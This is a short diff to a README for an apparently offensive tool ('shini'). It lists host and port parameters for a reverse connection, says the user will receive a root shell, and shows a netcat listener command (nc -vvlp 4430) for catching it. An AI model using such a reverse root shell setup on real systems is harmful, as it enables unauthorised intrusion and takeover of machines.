PedroCisnerosSantana/shini/README.md

 - host, machine that receives the reverse connection.
 - port, the port.

-If all goes well, you will get a root shell on nc.
+If all goes well, you will receive a root shell on nc.

 ```console
 $ nc -vvlp 4430